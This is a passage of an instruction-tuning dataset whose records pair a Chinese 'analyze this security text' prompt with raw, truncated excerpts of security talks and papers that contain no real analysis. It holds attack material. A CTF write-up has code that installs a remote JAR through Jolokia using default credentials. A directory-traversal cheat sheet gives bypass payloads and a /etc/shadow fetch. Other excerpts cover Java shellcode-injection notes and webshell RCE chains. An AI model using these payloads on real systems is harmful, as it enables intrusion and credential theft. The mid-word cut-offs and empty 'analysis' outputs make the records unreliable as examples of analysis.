minor child. If a person has legal control over an Auto or Building they can give consent. Landlord: Can Not give consent to search tenants property. Hotel Manager: Can Not give consent to search tenants room. Parents: Can Give consent to search all rooms of their h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nResilience is a form of health. - Dr. Steve Miles Grossman!!! I declare the global social space we are building to be naturally independent of the tyrannies you seek to impose on us. You have no moral right to rule us nor do you possess any methods of enforcement we have true reason to fear. - John Perry Barlow First the explorers, then the pioneers, then the merchants. And Then the Merchants from Imaginary Gardens February 26, 1998 One must spend at least a year after the first week in a new culture to learn as much as one did in that first week. Thats how fast we are assimilated. Human nature is almost unbelievably malleable, responding accurately and contrastingly to contrasting cultural conditions. Margaret Mead, (Sex and Temperament in Three Primitive Societies (1935) p. 191 The price one pays for pursuing any profession or calling is an intimate knowledge of its ugly side.  James Baldwin \"Whoever battles monsters should take care not to become a monster too, For if you stare long enough into the Abyss, the Abyss stares also into you.\" Friedrich Nietzsche, Beyond Good and Evil, chapter 4, no. 146 The illegal drug trade in Haiti involves trans-shipment of cocaine and marijuana to the United States. It is a major shipment route. Haiti in an ideal location for drug smuggling between Colombia and Puerto Rico. Cocaine is also often smuggled directly to Miami in freighters.[ U.S. government agencies estimate that eight percent of the cocaine entering the United States in 2006 transited Haiti or the Dominican Republic. Leading members of the Haitian military, intelligence and police were involved in the illegal drug trade in Haiti. Moral injury refers to an injury to an individual's moral conscience resulting from an act of perceived moral transgression which produces profound emotional shame. The concept of moral injury emphasizes the psychological, cultural, and spiritual aspects of trauma. We are technological somnambulists wandering through an extended dream. We don", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHORNECYBER.COM SECURE PENETRATION TESTING OPERATIONS: DEMONSTRATED WEAKNESSES IN LEARNING MATERIAL AND TOOLS PRE-PUBLICATION VERSION FOR CONFERENCE RELEASE | FOR THE FINAL REPORT, INCLUDING CODE AND DETAILED DESCRIPTION OF THE DEMONSTRATED TOOL, VISIT HORNECYBER.COM ABSTRACT Following previous presentations on the dangers penetration testers face in using current off-the-shelf tools and practices (Pwn the Pwn Plug and I Hunt Penetration Testers), this paper and presentation explores how widely available learning materials used to train penetration testers lead to inadequate protection of client data and penetration testing operations. Widely available books and other training resources target the smallest set of prerequisites, in order to attract the largest audience. Many penetration testers adopt the techniques used in simplified examples to real world engagements, where the network environment can be much more dangerous. Malicious threat actors are incentivized to attack and compromise penetration testers, and given current practices, can do so easily and with dramatic impact. The accompanying presentation to this paper includes a live demonstration of techniques for hijacking a penetration testers normal practices, as well as guidance for examining and securing penetration testing procedures. The tool shown in this demonstration will be released publicly (with code) along with the first presentation of this talk. INTRODUCTION This paper is a companion piece to the talk of the same title. In both this paper and the correlating talk, previous work is presented, followed by a review of the threats to penetration testers. A study was performed on a large body of penetration testing learning materials, illustrating the lack of secure practices being taught practices that have been observed to be repeated on real engagements. WESLEY MCGREW, PH.D. DIRECTOR OF CYBER OPERATIONS, HORNE CYBER WESLEY.MCGREW@HORNECYBER.COM @MCGREWSECURITY HORNECYBER.COM PAGE 2 Recommendations ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGhost in the Droid Possessing Android Applications with ParaSpectre Jeff Dileo (chaosdata) DEFCON 25 Hi! Im Jeff, and I have a problem. I like to do bad things to worse programming languages. *audience says* Hiiiiiiiiiiiiiiiiii Jeff Outline  Introduction  Motivation  Original Plan  Android Function Hooking 102  ParaSpectre  Demos  Future Work Introduction What is this about?  Injecting JRuby into Android applications to hook functionality Why should you care?  You reverse Android apps  You develop Android apps, but realize the debugging stack sucks  You like Ruby and/or REPLs $ irb irb (main):001:0> puts  this is a REPL this is a REPL => n i l irb (main):002:0> $ python Python 2.7.11 ( default , Mar 1 2016, 18:47:52) [GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.53)] on darwin Type help , copyright  , credits or license for more information . >>> print  this is also a REPL this is also a REPL >>> Motivation  Was reversing multiple complex Android apps  Including a screwy Korean chat app used primarily by Japanese people  Writing hooks for it was tedious and it was tricky to figure out what all of the nested obfuscated objects were Original Plan REPL-ize  Take the interesting functions ...and wrap them in REPLs!  REPLs are great  They give you an interactive shell  And let you poke around at stuff Android Function Hooking  LD_PRELOAD Shim to Win LD_PRELOAD:  Old-school function hooking  setprop wrap.<pkg> LD_PRELOAD=/path/to/file.so  Override dynamically linked native functions  Inject a native function to run early in app startup  Requires root access Android Function Hooking  LD_PRELOAD Example #include <dlfcn.h> #include <stdio.h> #include <unistd.h> static int (*_real_rand)(void) = NULL; __attribute__((constructor)) static void setup() { _real_rand = (int(*)(void))dlsym(RTLD_NEXT, \"rand\"); } int rand() { if(access(\".ps3mode\", F_OK) != -1 ) { return 4; } return (*_real_rand)(); } Android Function Hooking  Debugging Seems, madam? Nay, it is; I know not seems. Jav", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefeating static signatures in blackbox antivirus engines Insomnihack 2022 Vladimir Meier # whoami #Security researcher @ SCRT #Working on antivirus software since 2015 #Author of https://github.com/scrt/avcleaner #https://blog.scrt.ch Antivirus Bypass category 1 / 52 Contents #Demo #13 reasons why antivirus bypass research #Antivirus detection mechanisms #Extracting signatures #Demos: Meterpreter + kiwi vs Windows Defender #Limitations & future work 2 / 52 Demo #https://github.com/scrt/avdebugger #~ 3000 python LoC #Powered by radare2/rizin, lief and keystone #Application: # Meterpreters main DLL is detected by Windows Defender # Antivirus verdict is SLFPER:Win32/Meterpreter!ApiRetrieval # You have 4 hours 3 / 52 13 reasons why antivirus bypass research #Security software from a pentesters perspective #False sense of security #Really legit use case, I swear! 4 / 52 Security software vs pentesters AD Meterpreter Pwnable servers / workstations Trigger the AV == game over 5 / 52 13 reasons why antivirus bypass research #Security software from a pentesters perspective #False sense of security #Really legit use case, I swear! 6 / 52 Why: overpromoted IT security guy 7 / 52 13 reasons why #Security software from a pentesters perspective #False sense of security #Really legit use case # Company X sells a software # 39 different antivirus flag it as malware, every new release. # Company X actually worried its own product contains a virus. 8 / 52 13 reasons why #Really legit use case # Company X sells a software # 39 different antivirus flag it as malware, every new release. # Company X actually worried its own product contains a virus. #Obviously a false positive, but: # How do you prove it? # How do you fix it? => Call ghosbusters SCRT 9 / 52 Antivirus detection pipeline 10 / 52 Antivirus detection pipeline: bypass 11 / 52 Extracting signatures: Main steps #Scan automation #Mutations / search algorithms # Prior works # Improvements #Binary patching #Filtering results #Enc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Ghost pepper (web, 125p, 78 solved) In the challenge we get a link to webpage which requests Basic Auth from us. As a hint the page says `karaf`. Karaf is OSGi provider, and coincidentally the default user/password for the web interface is `karaf:karaf`. Now that we passed the authentication, we try to look around, but everything returns 404. We guessed that maybe the challenge name is some kind of hint. Ghost pepper is otherwise known as `jolokia`, and this happens to be a name of Java JMX-over-HTTP service. We confirmed this by checking `/jolokia` endpoint, which returned some data. Exposing JMX is usually a bad idea because it's always at least some infoleak. Here we've got OSGi running there as well, and it seems there were some JMX Managed Beans from Karaf exposed as well. OSGi is a Java platform which allows managing lifecycle of application components at runtime, without the need to restart the app. You can add/remove/substitute a component at runtime, deploy multiple versions etc, all while the app is running. From our perspective there is one particularly intersting operation -> installing and starting a new component. We can list all beans and operations they provide at `/jolokia/list`. JMX Bean `org.apache.karaf:name=root,type=bundle` provides `install(java.lang.String, boolean)` operation, where the first argument is URL for the JAR file containing the component, and boolean specifies if it should be automatically started. We can run this with: ```java public static void main(String[] args) throws Exception { J4pClient j4pClient = J4pClient.url(\"http://111.186.63.207:31337/jolokia/\").user(\"karaf\").password(\"karaf\").build(); J4pExecRequest req = new J4pExecRequest(\"org.apache.karaf:name=root,type=bundle\", \"install(java.lang.String, boolean)\", \"http://our.url/helloworld-1.0.0.jar\", true); J4pExecResponse resp = j4pClient.execute(req); System.out.println(resp.getValue().toString()); } ``` Now if we provide some interesting component to run, we should get ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01bettercap 0x02ssh rm /etc/dropbear/* dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key dropbear -r /etc/dropbear/dropbear_rsa_host_key 0x03root 1. /usr/share/mico/messaging/messaging.conf 0x04https 2. /usr/share/mico/messaging/mediaplayer.cfg CA 3. pub openssl rsa -inform DER -in priburp -pubout -out burp.pub 4. 5. sopub 6. 0x05", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH CPIO 1 \\\" -*- nroff -*- .SH NAME cpio \\- 存取归档包中的文件 .SH 总览 (SYNOPSIS) .B cpio {\\-o|\\-\\-create} [\\-0acvABLV] [\\-C bytes] [\\-H format] [\\-M message] [\\-O [[user@]host:]archive] [\\-F [[user@]host:]archive] [\\-\\-file=[[user@]host:]archive] [\\-\\-format=format] [\\-\\-message=message] [\\-\\-null] [\\-\\-reset-access-time] [\\-\\-verbose] [\\-\\-dot] [\\-\\-append] [\\-\\-block-size=blocks] [\\-\\-dereference] [\\-\\-io-size=bytes] [\\-\\-quiet] [\\-\\-force\\-local] [\\-\\-help] [\\-\\-version] < name-list [> archive] .B cpio {\\-i|\\-\\-extract} [\\-bcdfmnrtsuvBSV] [\\-C bytes] [\\-E file] [\\-H format] [\\-M message] [\\-R [user][:.][group]] [\\-I [[user@]host:]archive] [\\-F [[user@]host:]archive] [\\-\\-file=[[user@]host:]archive] [\\-\\-make-directories] [\\-\\-nonmatching] [\\-\\-preserve-modification-time] [\\-\\-numeric-uid-gid] [\\-\\-rename] [\\-\\-list] [\\-\\-swap-bytes] [\\-\\-swap] [\\-\\-dot] [\\-\\-unconditional] [\\-\\-verbose] [\\-\\-block-size=blocks] [\\-\\-swap-halfwords] [\\-\\-io-size=bytes] [\\-\\-pattern-file=file] [\\-\\-format=format] [\\-\\-owner=[user][:.][group]] [\\-\\-no-preserve-owner] [\\-\\-message=message] [\\-\\-force\\-local] [\\-\\-no\\-absolute\\-filenames] [\\-\\-sparse] [\\-\\-only\\-verify\\-crc] [\\-\\-quiet] [\\-\\-help] [\\-\\-version] [pattern...] [< archive] .B cpio {\\-p|\\-\\-pass-through} [\\-0adlmuvLV] [\\-R [user][:.][group]] [\\-\\-null] [\\-\\-reset-access-time] [\\-\\-make-directories] [\\-\\-link] [\\-\\-quiet] [\\-\\-preserve-modification-time] [\\-\\-unconditional] [\\-\\-verbose] [\\-\\-dot] [\\-\\-dereference] [\\-\\-owner=[user][:.][group]] [\\-\\-no-preserve-owner] [\\-\\-sparse] [\\-\\-help] [\\-\\-version] destination-directory < name-list .SH 描述 (DESCRIPTION) 本手册页 描述 GNU 版本 的 .BR cpio . .B cpio 可以 从 cpio 或 tar 格式 的 归档包(archive) 中 读写 文件, 归档包 是 一种文件, 它 由 归档文件 及其 相关信息 组成, 例如 文件名, 属主, 时标 (timestamp), 和 访问权限. 归档包 可以 是 磁盘上的 文件, 也可以 是 磁带或管道. .B cpio 有 三种 操作模式. .PP 在 copy-out 模式中, .B cpio 把 文件 复制到 归档包 中. 它 从 标准输入 读取 文件名列表, 每行一个文件名. 生成的 归档包 写到 标准输出. 产生 文件名列表 的 典型方法 是 使用 .B find 命令; 你 可能 要在 .B find 后面 用上 \\-depth 选项, 减少 因为 进入 没有 访问权限 的 目录 引起 的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Johannesburg - Hideout Category: Reversing ## Description > Johannesburg is hot, and you are on your way to the secret lair. It seems like it is well fortified, even though you are expected under the alias of the assassin, perhaps it will be a better idea to sneak inside the lair, unseen? You climb up on a brick wall, and jump over it. On the other side you spot a lot of guards, quick, hide in a bush. Now you have to sneak past the guards into the main building's entrance. > > Challenge: Konski-Hiakawa Law of Droids (reversing) > > In this challenge, you have to find the flag using memory forensics. Good luck! Note, surround the flag with CTF{...} to submit it. Note, API Level 25 is what you're looking for. Two files were attached: `bzImage` and `gCTF.apk`. ## Solution We start by extracting the `apk` file and poking around: ```console (user@kali)-[/media/sf_CTFs/google/9_Johannesburg_-_Hideout] $ ~/utils/android/jadx/build/jadx/bin/jadx -d output gCTF.apk INFO - loading ... INFO - processing ... ERROR - finished with errors, count: 1 ``` We get two interesting files. `MainActivity.java`: ```java package gctf.researchctf; import android.app.Activity; import android.os.Bundle; import android.os.Environment; import android.util.Log; import android.view.View; import android.widget.EditText; import android.widget.TextView; import android.widget.Toast; import java.io.File; import java.io.FileOutputStream; import static android.os.Environment.DIRECTORY_DOWNLOADS; public class MainActivity extends Activity { private EditText tv = null; // Used to load the 'native-lib' library on application startup. static { System.loadLibrary(\"native-lib\"); } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); try{ File bf = new File(Environment.getExternalStoragePublicDirectory(DIRECTORY_DOWNLOADS), \"Raven.txt\"); File f = new File(getApplicationContext().getFilesDir(), \"SusanSue.txt\"); FileOutputStre", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Java注ShellCode踩坑 前 三种法简介 JNI JNA JVM 踩坑 放弃JNA JVM的坑 正确操作 测试 实现代码 最后 @yzddmr6 @zsxq: websafe 在做As-Exploits的Java Shellcode加载模块的时候遇到了很多的坑在这跟家分享下 宽字节的这篇章写的很好java执shellcode的种法主要也是根据这篇章来实现的这简单 总结下 由于Java屏蔽了很多底层的细节所以没办法直接原Java去注shellcode但是Java提供了加载 C++动态链接库的法所以我们可以把加载Shellcode的代码写在dll然后Java去调dll即可冰 蝎就是采的这种法但是缺点是件要落地很容易被杀 写过C#的shellcode加载器的同学应该知道主要到了windows中kernel32.dll这个动态链接库这个 dll中包含了新建进程线程注等很多底层的法如果Java能调到这个dll就可以实现任意 shellcode的加载 前 三种法简介 JNI JNA 2 正好JNA这个库对JNI进了封装并且可以调kernel32后的操作就跟C#的写法差不多了 就是换成了Java语 很多APT都了这种法具体实现可以看我的这个项https://github.com/yzddmr6/Java- Shellcode-Loader 核代码来于https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/ 这个操作就较秀了宽字节的师傅发现在java agent注的过程中会往标进程去塞shellcode并 且这个native法是jdk带的并且经过oracle签名的 其中主要到了WindowsVirtualMachine.java这个类native法源码在这 WindowsVirtualMachine.c 因为JNA的库不是jdk带的当时就理所应当的想到先jarloader模块把这个jar打到内存中然后 反射去调这样件就不会直接落地结果gui都画好了发现jar直打不进去后来调了下发现 是因为jar太超过了Tomcat默认的最POST2m 然后想到了利multipart的格式来上传结果Java必须要通过动解析multipart的内容才可以获取到 的参数值不能直接使request.getParameter来获取这样就还需要修改shell中的代码放弃 接着就想到shiro反序列化中也有header度的问题Litch1师傅在基于全局储存的新思路 | Tomcat的 种通回显法研究这篇章提到了可以反射去修改Tomcat header最度的参数那么POST最 度的应该也是可以修改的但是看到后需要多个连接同时访问后就放弃了太麻烦了放 弃 既然改着很麻烦那脆就直接不改了先利件上传把jar传到标的个录然后 URLClassLoader去加载也是可以的但是这样也会导致件直接落地跟JNI相是把落地的dll变成 了jar已不过前杀软对jar的查杀度要dll弱得多 总的来说这种式不是很优雅所以最后还是放弃了 JVM 踩坑 放弃JNA 3 前篇章提到了测试这种法的时候会把java进程给打挂原因是我本地的java进程位数跟测试机的 java位数是不样的 本进制弟弟现学了点shellcode的知识说的不定对仅供参考 般情况下采线程注的时候32位进程只能注32位的shellcode到32位进程64同理 利java agent这种shellcode注法属于线程注所以来说知道标进程的位数是很重要的 但是很遗憾除了调kernel32中的IsWow64Process API以外我没有找到其他判断标进程位数的 法想要Java调这个API还得到上JNA这个库所以想要实现对任意进程的注是不的 Java系统变量中有个参数sun.arch.data.model标注了当前Java的位数这样我们虽然不知道其他 进程的位数但是我们可以知道Java进程的位数所以可以把shellcode注到 但是这种法存在很险如果位数不对很可能把Java进程给死直接把站给打挂了 在实际测试中msf较坑在shellcode执结束/位数错误/migrate的时候会把java给死 cs如果注错位数的话没有什么反应Tomcat也不会挂掉inject的时候也不会把原来的进程给杀死 1. 基本信息exploitCtrl+F搜索 sun.arch.data.model查看java位数 2. 根据java位数成对应的shellcode并开启监听 需要注意的是MSF需要加上PrependMigrate=true PrependMigrateProc=xxxx.exe参数动迁移到 新的进程重要 如 JVM的坑 正确操作 4 3. 在ShellCode加载器模", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSmashing The Browser: From Vulnerability Discovery To Exploit Chen Zhang (@demi6od) NSFOCUS Security Team demi6d@gmail.com h>ps://github.com/demi6od Date: 2014 August 19th Agenda  Who am I  Stage1 - Browser Fuzzing Technology  Stage 2 - Advance Browser ExploitaTon Techniques  Stage 3 - IE 11 0day Exploit Development  Q&A Who am I  Shanghai Jiao Tong University  InformaTon Security: 4 + 3 years  NSFOCUS Security Team  Security Researcher: 2+ years  Research Interests  Browser security  Vulnerability analysis, discovery and exploit  APT/0 day detecTon R&D  Li>le science Who am I  Shanghai Jiao Tong University  InformaTon Security: 4 + 3 years  NSFOCUS Security Team  Security Researcher: 2+ years  Research Interests  Browser security  Vulnerability analysis, discovery and exploit  APT/0 day detecTon R&D  Li>le science Browser Fuzzing IntroducTon Vulnerability discovery:  White box  Code review  MWR labs  Chrome type confusion  Pinkie Pie  2012 Pwnium  2013 Mobile Pwn2Own  Automated code review  ForTfy  RATS  Black box  Fuzzing Browser Fuzzing IntroducTon Two fuzzing technology  StaTc fuzzing  MutaTon  Document  MulTmedia  bf3  GeneraTon  Browser  Achilles' heel  Testcase generaTng Browser Fuzzing IntroducTon  Dynamic fuzzing  Fuzzing framework  Grinder  Fuzzer  CrossFuzz  ndujaFuzz  NodeFuzz  X-Fuzzer  jsFunFuzz  Achilles' heel  Testcase reconstrucTng  Heisenberg principle DynamicFuzz.js: switch (rand(2)) { case 0: // Fuzz procedure 1; break; case 1: // Fuzz procedure 2; break; } StaLcFuzz1.js: // Fuzz procedure 1; StaLcFuzz2.js: // Fuzz procedure 2; Browser Fuzzing IntroducTon Google ClusterFuzz  AddressSaniTzer  Clang  LLVM  Linux and Mac  Tons of test cases Browser Fuzzing IntroducTon  How to write fuzzer?  Collect PoCs  SpecificaTon  W3C  MDN  MSDN  DefiniTve guides  Javascript  HTML  CSS  Novel ideas StateFuzzer My Fuzzer Framework  IE 11 + Google Chrome  Code base:  Javascript  Core and uTliTes: 4000+  DicTonary: 2000+  Python  Automated Grinder compaTble  Automate", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE EVOLUTION OF ANDROID APP PACKING AND UNPACKING TECHNIQUES THIS IS NOT GOING TO END YAJIN ZHOU HITCON2016 ABOUT ME  Earned P.h.D. in Computer Science from NC State University  Research mainly focuses on smartphone and system security  Now involving in C0RE Team  More information: http://yajin.org 2 HITCON2016 AGENDA  Why app packing services are becoming popular  The main app packing/unpacking techniques  New trends 3 HITCON2016 APP REPACKAGING 4 0 27.5 55 82.5 110 SOFTWARE GAME  Given10,305 popular apps, 954,986 repackaged apps are found* *Datasource Link HITCON2016 THE CONSEQUENCES OF APP REPACKAGING  Developers  Users 5 How easily to repackage an app? Video Demo HITCON2016 APP PACKING SERVICE PROVIDERS 7 FREE SERVICE HITCON2016 DOUBLE-EDGED SWORD  Packing services create problem for both good and bad guys  Bad guys: malware authors, ()  hard to repackage popular apps  Good guys: app markets maintainers, security researchers(??)  8 HITCON2016 IN REALITY  App packing services are abused by bad guys 9 *Datasource Link HITCON2016 MAIN TYPES OF APP PACKING TECHNIQUES  Static: cheat statical analysis tools  Dynamic  Memory dex loading: directly load encrypted dex file into memory and execute  Anti-analysis: raise the bar for dynamic analysis 10 HITCON2016 MAIN TYPES OF APP UNPACKING TECHNIQUES  Static: reverse engineer the encryption algorithm  Pros: one method to kill all samples  protected by one packer  Cons: hard  usually the encryption algorithm is in the native code, and continuously changing 11 HITCON2016 MAIN TYPES OF APP UNPACKING TECHNIQUES  Dynamic: memory dump  Basic idea: the unencrypted bytecode will be eventually in memory  Lack of self-modifying (and JITed bytecode) support 12 ENCRYPTED CODE DVM DECRYPTED CODE PACKER META DATA App Packing Techniques: Static HITCON2016 MANIFEST CHEATING  Manifest file: define package name, permissions, components   When parsed, attributes are translated into ids  If we insert an id to represent an undefined Java class  aa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Directory Traversal > A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing \"traverse to parent directory\" are passed through to the file APIs. ## Summary * [Tools](#tools) * [Basic exploitation](#basic-exploitation) * [16 bits Unicode encoding](#16-bits-unicode-encoding) * [UTF-8 Unicode encoding](#utf-8-unicode-encoding) * [Bypass \"../\" replaced by \"\"](#bypass--replaced-by-) * [Bypass \"../\" with \";\"](#bypass--with-) * [Double URL encoding](#double-url-encoding) * [UNC Bypass](#unc-bypass) * [NGINX/ALB Bypass](#nginxalb-bypass) * [Path Traversal](#path-traversal) * [Interesting Linux files](#interesting-linux-files) * [Interesting Windows files](#interesting-windows-files) * [References](#references) ## Tools - [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) ```powershell git clone https://github.com/wireghoul/dotdotpwn perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b ``` ## Basic exploitation We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. ```powershell ../ ..\\ ..\\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ``` ### 16 bits Unicode encoding ```powershell . = %u002e / = %u2215 \\ = %u2216 ``` ### UTF-8 Unicode encoding ```powershell . = %c0%2e, %e0%40%ae, %c0ae / = %c0%af, %e0%80%af, %c0%2f \\ = %c0%5c, %c0%80%5c ``` ### Bypass \"../\" replaced by \"\" Sometimes you encounter a WAF which remove the \"../\" characters from the strings, just duplicate them. ```powershell ..././ ...\\.\\ ``` ### Bypass \"../\" with \";\" ```powershell ..;/ http://domain.tld/page.jsp?include=..;/..;/sensitive.txt ``` ### Double URL encoding ```powershell . = %252e / = %252f \\ = %255c ``` **e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNCC Group Whitepaper Secure Messaging for Normal People July 20, 2015  Version 1.0 Prepared by Justin Engler  Principal Security Consultant Cara Marie  Senior Security Consultant (Diagrams) Abstract \"Secure\" messaging programs and protocols continue to proliferate, and crypto ex- perts can debate their minutiae, but there is very little information available to help the rest of the world differentiate between the different programs and their features. This paper discusses the types of attacks used against a variety of messaging models and discusses how secure messaging features can defend against them. The goal of this paper is to help inform those who are tech-savvy but not crypto-experts to make smart decisions on which crypto applications to use. Table of Contents 1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.1 What is a message? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.2 Cryptography is magic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.3 Cryptobabble . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2 Your own threat model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 2.1 Adversary types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 2.2 Why are you keeping secrets? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 3 Messages without encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1001 ways to PWN prod A tale of 60 RCE in 60 minutes 1. Whats in this talk? 2. RCE, RCE, RCE!!! 3. Takeaways @TheLaluka thinkloveshare.com 1 1. Whats in this talk? 2 In this talk, RCEs are : - Authent-less - Fully chained - Disclosed & Fixed - Legally POCed  Le Breakage Lalu 3 *angry customer data noise* 4 5 2. RCE, RCE, RCE!!! 6 AXIS 1.4 & Custom code  Why & How  Vulnerable Axis 1.4 server  Usually XXE to SSRF to RCE   BUT Exposed /axis/services/AdminService  Misconfigured reverse proxy  Deploy a custom service : webshell.jsp  Sources  https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce  https://copyfuture.com/blogs-details/20211206221333010S 7 Arbitrary URI copy - rwservlet  Why & How  Java report rwservlet = SSRF + file write  Used XXE to read logs, found WEBROOT  SSRF to reflect a jsp webshell in XSS  Copy URI & XSS to WEBROOT/webshell.jsp  Sources  https://www.pentestpartners.com/security-blog/hacking-oracle-reporter-a-how-to/  https://nerdint.blogspot.com/2018/05/less-time-to-perform-penetration-tests.html 8 Weak credentials & JSPF upload  Why & How  Exposed WebDav, weak credentials admin:admin  Hidden jsp files but .class accessible, jd-cli ftw!!  Reverse shows jspf are included   Backup and overwrite a .jspf included in a .jsp  blocked <% : BIG-IP bypass with multipart upload  Query the .jsp for reverse shell  Sources  https://fr.wikipedia.org/wiki/WebDAV  https://stackoverflow.com/questions/2081005/ what-is-jspf-file-extension-how-to-compile-it 9 XXE OOB file read, password in logs, SSTI  Why & How  Error based SQLi in password reset  Out of bound XXE to leak log file  Old java sdk + xxe = directory listing  Admin plaintext password in logs   SSTI in custom code, Apache Velocity  Trigger the template rendering, notify me by email  Sources  https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection  https://velocity.apache.org/  https://github.com/301415926/PENTESTING-BIBLE/blob/master/11-part-24-articl e/XXE%20OOB%20exploitation%20at%20Ja", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJoshua Corman && Nicholas J. Percoco The Cavalry Year[0] A Path Forward for Public Safety Our Dependance on Technology is Growing Faster than our Ability to Secure it. Our Dependance on Technology is Growing Faster than our Ability to Secure it. Problem Statement: While we struggle to secure our organizations, connected technologies now permeate every aspect of our lives; in our cars, our bodies, our homes, and our public infrastructure. Our Mission: To ensure technologies with the potential to impact public safety and human life are worthy of our trust. Collecting, Connecting, Collaborating, Catalyzing Our Approach: Collecting existing research and researchers towards critical mass. Our Approach: Connecting researchers with each other and stakeholder in media, policy, legal, and affected industries. Our Approach: Collaborating across a broad range of background and skill sets. Our Approach: Catalyzing research and corrective efforts sooner than would happen on their own. Our Approach: One thing is clear The Cavalry Isn't Coming It Falls To Us It Falls To YOU! One thing is clear The Cavalry Isn't Coming It Falls To Us We must be ambassadors of our profession We must be the voice of technical literacy We must research that which matters We must amplify our efforts We must escape the echo chamber We must team with each other Year[0] Activities Year[0] Activities Research Conferences Government Industry Press Deliverables People What Worked Well What Worked Well The Mission The problems statement, instinct & timing were right. While pieces of this were tried before, timing matters ! Collecting, Connecting, Collaborating, Catalyzing Teamwork and collective knowledge proved immediately useful to existing research & researchers. E.g. in Medical & Auto ! It Takes a Guild Diverse, but complementary skills made us stronger - including people from industry and from government What Worked Well (contd) Finding Members to Educate Us To ready ourselves to be better ambassadors to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProtecting your IT infrastructure from Legal attacks: Subpoenas, Warrants and Transitive Attacks Alexander Muentz, Esq. Defcon 15 Disclaimer  I am a lawyer, but not your lawyer  The topics presented reflect my personal views and are not necessarily those of ONSITE3  This talk is not legal advice, but for educational and entertainment purposes  This field of law is in flux. What is good law today may not be next month  Local laws vary. Overview Using the preparation/attack/response model Types of attacks What can I do to protect myself, my organization and my users? Legal methods as IT infrastructure attacks  Similar aims  Shutdown  Injunction  DOS attack  Information  Database intrusion  Subpoena  Similar precautions  Good offsite backups  Destructive search warrant execution  Natural disaster  Strong searching & archiving solution  Good for responding to discovery order  Useful for preventing redundant storage Types of Legal attacks  Search Warrants  Subpoenas  Discovery  Wiretaps  Transitive trust attacks Search Warrants  The rights of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized Fourth Amendment, U.S. Constitution Search Warrants, continued  Warrant requires:  Neutral Judicial Officer, who determines that  Probable cause that a  Crime occurred, and that Persons named and/or Evidence is within place to be searched  Signed, written affidavit by LEO attesting to probable cause above  Particularity of items to be seized and area to be searched.  Warrant allows-  The items named in the warrant  Seizure of contraband, evidence, fruits and instrumentalities of crime found during search  For computers containing the above, the seizure of the data or the computer (LEOs discretion) Search Warrant as atta", "category": "text_analysis", "source": "security_papers"}
